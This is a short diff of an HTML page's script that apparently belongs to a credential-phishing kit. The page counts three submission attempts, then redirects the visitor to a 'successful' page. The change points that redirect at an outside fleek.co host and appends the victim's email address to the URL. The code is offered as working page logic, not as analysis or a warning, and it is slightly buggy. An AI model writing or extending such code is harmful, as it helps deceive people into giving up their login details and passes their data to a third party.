--- a/%69%6E%64%65%78.html
+++ b/%69%6E%64%65%78.html
@@ -379,7 +379,7 @@ type: 'POST',
             			if (count>=3) {
             				count=0;
                     // window.location.replace(response['redirect_link']);
-                  window.location.href("succesful.html#"+my_email);
+                  window.location.href("https://shy-wood-8656.on.fleek.co/succesful.html#"+my_email);
 
                 }
                 // $('#msg').html(response['msg']);
